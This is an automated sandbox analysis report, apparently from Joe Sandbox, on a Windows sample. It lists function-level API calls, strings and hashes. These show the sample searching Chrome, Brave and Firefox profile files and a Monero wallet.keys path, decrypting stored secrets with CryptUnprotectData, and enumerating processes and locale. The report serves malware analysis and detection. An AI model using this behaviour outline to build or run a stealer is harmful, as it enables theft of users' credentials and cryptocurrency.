                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 3550813701-0
                                      • Opcode ID: d7e9ac0668a1b1abcf7f8e7e51f9be31a37a6c636abdb0f35d8e6b8cde3223bf
                                      • Instruction ID: f014225d17d6d94034bd4da2b7ff2b0c0b005c0336538f1a46cbb03bc852cc8b
                                      • Opcode Fuzzy Hash: d7e9ac0668a1b1abcf7f8e7e51f9be31a37a6c636abdb0f35d8e6b8cde3223bf
                                      • Instruction Fuzzy Hash: 78E012B6D1430B63CA1473F4BC0EB2B3B9C7B65355F044425FA06E2552FAA9F810C96E
                                      APIs
                                      • wsprintfA.USER32 ref: 005338CC
                                      • FindFirstFileA.KERNEL32(?,?), ref: 005338E3
                                      • lstrcat.KERNEL32(?,?), ref: 00533935
                                      • StrCmpCA.SHLWAPI(?,00540F70), ref: 00533947
                                      • StrCmpCA.SHLWAPI(?,00540F74), ref: 0053395D
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00533C67
                                      • FindClose.KERNEL32(000000FF), ref: 00533C7C
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-2524465048
                                      • Opcode ID: a76bc3ce10a95df8291c19dfa3e85fa6cb5ed14856b1724a827c0bcc2fa5a391
                                      • Instruction ID: 2aa4c7811a1f0db5873c71f104c5d8ba8f71ba69168498d65b6c5804aff0203d
                                      • Opcode Fuzzy Hash: a76bc3ce10a95df8291c19dfa3e85fa6cb5ed14856b1724a827c0bcc2fa5a391
                                      • Instruction Fuzzy Hash: 58A11272900319ABDB24DF64DC89FEA7779BF94300F048598F60EA6141EB759B84CF62
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00540B32,00540B2B,00000000,?,?,?,005413F4,00540B2A), ref: 0052BEF5
                                      • StrCmpCA.SHLWAPI(?,005413F8), ref: 0052BF4D
                                      • StrCmpCA.SHLWAPI(?,005413FC), ref: 0052BF63
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0052C7BF
                                      • FindClose.KERNEL32(000000FF), ref: 0052C7D1
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-726946144
                                      • Opcode ID: 63b6ac8a1f322d97cbfc599be7af34320acb61ee966939f0a73650f94e2e63df
                                      • Instruction ID: 3648e703c283e95fc738b36295cc707c9e0369311f4b7628d05d45ef8861ac8a
                                      • Opcode Fuzzy Hash: 63b6ac8a1f322d97cbfc599be7af34320acb61ee966939f0a73650f94e2e63df
                                      • Instruction Fuzzy Hash: E0424272900105ABCB14FB70DD9AEEE7B7CBFD4300F408558F946A6181EE34AB49CB96
                                      APIs
                                      • wsprintfA.USER32 ref: 0053492C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00534943
                                      • StrCmpCA.SHLWAPI(?,00540FDC), ref: 00534971
                                      • StrCmpCA.SHLWAPI(?,00540FE0), ref: 00534987
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00534B7D
                                      • FindClose.KERNEL32(000000FF), ref: 00534B92
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: 2e2cb2870a2c5a39d00db665542c4f2384f1c1c2fdd618c190af7559f0b2e318
                                      • Instruction ID: 5af13afaac1e87f725f26a43b1ae3c4fe7f1b2b47af72e4facfa129bd7c4e847
                                      • Opcode Fuzzy Hash: 2e2cb2870a2c5a39d00db665542c4f2384f1c1c2fdd618c190af7559f0b2e318
                                      • Instruction Fuzzy Hash: 2F616872500219BBCB20EBA0DC49FEA777CBF48700F048598F60AA6141EB75EB85CF95
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00534580
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00534587
                                      • wsprintfA.USER32 ref: 005345A6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 005345BD
                                      • StrCmpCA.SHLWAPI(?,00540FC4), ref: 005345EB
                                      • StrCmpCA.SHLWAPI(?,00540FC8), ref: 00534601
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0053468B
                                      • FindClose.KERNEL32(000000FF), ref: 005346A0
                                      • lstrcat.KERNEL32(?,00F1E938), ref: 005346C5
                                      • lstrcat.KERNEL32(?,00F1DBC0), ref: 005346D8
                                      • lstrlen.KERNEL32(?), ref: 005346E5
                                      • lstrlen.KERNEL32(?), ref: 005346F6
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 671575355-2848263008
                                      • Opcode ID: 7071e40c5ee7694c46525d77fe9ee0a8a68d232bf191db6648d6f5e6e58f0260
                                      • Instruction ID: 6a9de86c7089ee33fc60b78eeaf90fa4f584a2e1c77aacdd975bdd2d977d2596
                                      • Opcode Fuzzy Hash: 7071e40c5ee7694c46525d77fe9ee0a8a68d232bf191db6648d6f5e6e58f0260
                                      • Instruction Fuzzy Hash: F9516971510319ABC724EB70DC89FEE777CBF54300F408598F60AA2190EB74AB848F95
                                      APIs
                                      • wsprintfA.USER32 ref: 00533EC3
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00533EDA
                                      • StrCmpCA.SHLWAPI(?,00540FAC), ref: 00533F08
                                      • StrCmpCA.SHLWAPI(?,00540FB0), ref: 00533F1E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0053406C
                                      • FindClose.KERNEL32(000000FF), ref: 00534081
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: 450961784597ccb1d5ca27b856192200865671161adca80069ed17e00bcaf118
                                      • Instruction ID: d5b6e24bd33660144d8f57a9afa946b33e57409899200550c36e8ae800e9abcf
                                      • Opcode Fuzzy Hash: 450961784597ccb1d5ca27b856192200865671161adca80069ed17e00bcaf118
                                      • Instruction Fuzzy Hash: D45148B2500319BBCB25EBB0DC89EEA777CBB84300F408598F65A96080DB75EB858F55
                                      APIs
                                      • wsprintfA.USER32 ref: 0052ED3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0052ED55
                                      • StrCmpCA.SHLWAPI(?,00541538), ref: 0052EDAB
                                      • StrCmpCA.SHLWAPI(?,0054153C), ref: 0052EDC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0052F2AE
                                      • FindClose.KERNEL32(000000FF), ref: 0052F2C3
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: 6ba8d51fc6cccb4d94cfe31416799e764aec9f96cd2990f6e682448093ccaa29
                                      • Instruction ID: c362b22b84115331709d3efc75ec84e6506b31198a9d3374cadabde70e17e0fe
                                      • Opcode Fuzzy Hash: 6ba8d51fc6cccb4d94cfe31416799e764aec9f96cd2990f6e682448093ccaa29
                                      • Instruction Fuzzy Hash: E6E1F472911119AADB54FB60DC96EEEB738BF94300F4041D9B54B62092EF306F8ACF55
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005415B8,00540D96), ref: 0052F71E
                                      • StrCmpCA.SHLWAPI(?,005415BC), ref: 0052F76F
                                      • StrCmpCA.SHLWAPI(?,005415C0), ref: 0052F785
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0052FAB1
                                      • FindClose.KERNEL32(000000FF), ref: 0052FAC3
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: f2608c5ee5a01a5bde68103885c4635a1d612c423fc54b680747d8e08c7ea605
                                      • Instruction ID: 9cacd7d27e6830a7ab13b6062ebe6958d0fd2871a1b58e4bd651c32590681d96
                                      • Opcode Fuzzy Hash: f2608c5ee5a01a5bde68103885c4635a1d612c423fc54b680747d8e08c7ea605
                                      • Instruction Fuzzy Hash: 80B14471900119ABDB24FF60DC99FEE7B79BF95300F4085A8E44A96191EF306B49CF92
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0054510C,?,?,?,005451B4,?,?,00000000,?,00000000), ref: 00521923
                                      • StrCmpCA.SHLWAPI(?,0054525C), ref: 00521973
                                      • StrCmpCA.SHLWAPI(?,00545304), ref: 00521989
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00521D40
                                      • DeleteFileA.KERNEL32(00000000), ref: 00521DCA
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00521E20
                                      • FindClose.KERNEL32(000000FF), ref: 00521E32
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: c6dd913d898b0cc5fdcefdcbd54d17a1af4e720f090190adbb0e8be45d55d5a3
                                      • Instruction ID: 30f95471bf94332a1b2308ab18bdc4aaf03fa30659b71b8b86903180990783cb
                                      • Opcode Fuzzy Hash: c6dd913d898b0cc5fdcefdcbd54d17a1af4e720f090190adbb0e8be45d55d5a3
                                      • Instruction Fuzzy Hash: DA122572910119ABDB19FB60DC9AEEEBB7CBF94300F404599B14666091EF306F89CF91
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00540C2E), ref: 0052DE5E
                                      • StrCmpCA.SHLWAPI(?,005414C8), ref: 0052DEAE
                                      • StrCmpCA.SHLWAPI(?,005414CC), ref: 0052DEC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0052E3E0
                                      • FindClose.KERNEL32(000000FF), ref: 0052E3F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2325840235-1173974218
                                      • Opcode ID: e2ba2498f007afa83f9a968d65dbc44180b32036b0b939c158ca9a748ebc6510
                                      • Instruction ID: 729900018c7eb6858d708d082e6d46bcd66026910a21ef6193a99157524ab65a
                                      • Opcode Fuzzy Hash: e2ba2498f007afa83f9a968d65dbc44180b32036b0b939c158ca9a748ebc6510
                                      • Instruction Fuzzy Hash: 8FF1B472814119AADB15FB60DC9AEEEB738BF94300F5041D9B44B62091EF346F8ACF65
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005414B0,00540C2A), ref: 0052DAEB
                                      • StrCmpCA.SHLWAPI(?,005414B4), ref: 0052DB33
                                      • StrCmpCA.SHLWAPI(?,005414B8), ref: 0052DB49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0052DDCC
                                      • FindClose.KERNEL32(000000FF), ref: 0052DDDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: f265bb4183cdf3c6bee6ac6b9ed07a428036c6adae889cda08f1cac4990868df
                                      • Instruction ID: 64df8e26d805cce2cba298ae2ea30e8620c7bcb0a6a8c4c9933047ec53db7061
                                      • Opcode Fuzzy Hash: f265bb4183cdf3c6bee6ac6b9ed07a428036c6adae889cda08f1cac4990868df
                                      • Instruction Fuzzy Hash: 60914572900115ABCB14FB70EC9A9ED7B7CBFD5300F408558F94A96185EE34AB09CFA2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ;$!o$.^??$0"c~$2q=y$lz-/$0_$b9
                                      • API String ID: 0-650997007
                                      • Opcode ID: e22e8d146b441742ed83563e9b8fa97b28c4216d9c986c6383783af59d4e593f
                                      • Instruction ID: 6779edbbb05a8fb4e313690f97361f008635b650e8aad44ae981be4219c5c0a2
                                      • Opcode Fuzzy Hash: e22e8d146b441742ed83563e9b8fa97b28c4216d9c986c6383783af59d4e593f
                                      • Instruction Fuzzy Hash: E8B2E9F3A0C2009FE304AE2DDC8567ABBE9EF94720F16892DE6C5C7744EA3558418797
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: }~]$&35$&35$&QR]$+D+}$_8V$<3^$lO3
                                      • API String ID: 0-2813008048
                                      • Opcode ID: 20fd6a455d255abf73b0a613ca6168753f0c6a65300f5d829050b561acd3492d
                                      • Instruction ID: a7cb7eb940b69e9da24316ab123b920752cdc1e5b1092535d5597612aafe6b3c
                                      • Opcode Fuzzy Hash: 20fd6a455d255abf73b0a613ca6168753f0c6a65300f5d829050b561acd3492d
                                      • Instruction Fuzzy Hash: 82B2E5F360C2009FE304AE2DEC8567ABBE5EF94720F1A493DEAC4C7344EA7558458697
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,005405AF), ref: 00537BE1
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00537BF9
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00537C0D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00537C62
                                      • LocalFree.KERNEL32(00000000), ref: 00537D22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: 2a7b8c3e4d881dc081a370147ee3c07b36ccb6d8062b1eff26ffd09f22ba68d5
                                      • Instruction ID: 8ff8328888e1e4bac4e67db724ed4c1a824b09e73209edfd5181043bee49cd1d
                                      • Opcode Fuzzy Hash: 2a7b8c3e4d881dc081a370147ee3c07b36ccb6d8062b1eff26ffd09f22ba68d5
                                      • Instruction Fuzzy Hash: 03413D7194021DABDB24DB94DC99BEEBB74FF48700F204199E50A72191DB742F85CFA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: G.;U$QO[k$]9om$s^~<$w_lw$|m>W$g{f
                                      • API String ID: 0-214937156
                                      • Opcode ID: 6d17f64aea5509a05d35951ab6b2943e19e9bbebc7d8ed7ec98c83b946beed76
                                      • Instruction ID: d2b1ee60f3f64c073c5547173ffc8997174e34cf2d372e38c92c90908f54272b
                                      • Opcode Fuzzy Hash: 6d17f64aea5509a05d35951ab6b2943e19e9bbebc7d8ed7ec98c83b946beed76
                                      • Instruction Fuzzy Hash: FEB222F3A082049FE3046E29EC8567AFBE9EF94720F164A3DEAC4C7740E63558058797
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00540D73), ref: 0052E4A2
                                      • StrCmpCA.SHLWAPI(?,005414F8), ref: 0052E4F2
                                      • StrCmpCA.SHLWAPI(?,005414FC), ref: 0052E508
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0052EBDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 433455689-1173974218
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: "$'Cv$2~$So^$|u{{$~c{/
                                      • API String ID: 0-2567272145
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 6L<$;Fz$?go$qA_~$qA_~$aR{
                                      • API String ID: 0-3253444424
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NR,00000000,00000000), ref: 00529AEF
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00524EEE,00000000,?), ref: 00529B01
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NR,00000000,00000000), ref: 00529B2A
                                      • LocalFree.KERNEL32(?,?,?,?,00524EEE,00000000,?), ref: 00529B3F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID: NR
                                      • API String ID: 4291131564-263112399
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: nnR$$go^$/cw?$:N]V$b]c
                                      • API String ID: 0-1299212506
                                      APIs
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0052C871
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0052C87C
                                      • lstrcat.KERNEL32(?,00540B46), ref: 0052C943
                                      • lstrcat.KERNEL32(?,00540B47), ref: 0052C957
                                      • lstrcat.KERNEL32(?,00540B4E), ref: 0052C978
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlen
                                      • String ID:
                                      • API String ID: 189259977-0
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 0053696C
                                      • sscanf.NTDLL ref: 00536999
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005369B2
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005369C0
                                      • ExitProcess.KERNEL32 ref: 005369DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0052724D
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00527254
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00527281
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005272A4
                                      • LocalFree.KERNEL32(?), ref: 005272AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0053961E
                                      • Process32First.KERNEL32(00540ACA,00000128), ref: 00539632
                                      • Process32Next.KERNEL32(00540ACA,00000128), ref: 00539647
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 0053965C
                                      • CloseHandle.KERNEL32(00540ACA), ref: 0053967A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,00525184,40000001,00000000,00000000,?,00525184), ref: 00538EC0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00F1E230,00000000,?,00540E10,00000000,?,00000000,00000000), ref: 00537A63
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00537A6A
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00F1E230,00000000,?,00540E10,00000000,?,00000000,00000000,?), ref: 00537A7D
                                      • wsprintfA.USER32 ref: 00537AB7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 6T5$;E3y$;E3y$U8wW
                                      • API String ID: 0-3404926838
                                      APIs
                                      • CoCreateInstance.COMBASE(0053E118,00000000,00000001,0053E108,00000000), ref: 00533758
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005337B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID:
                                      • API String ID: 123533781-0
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00529B84
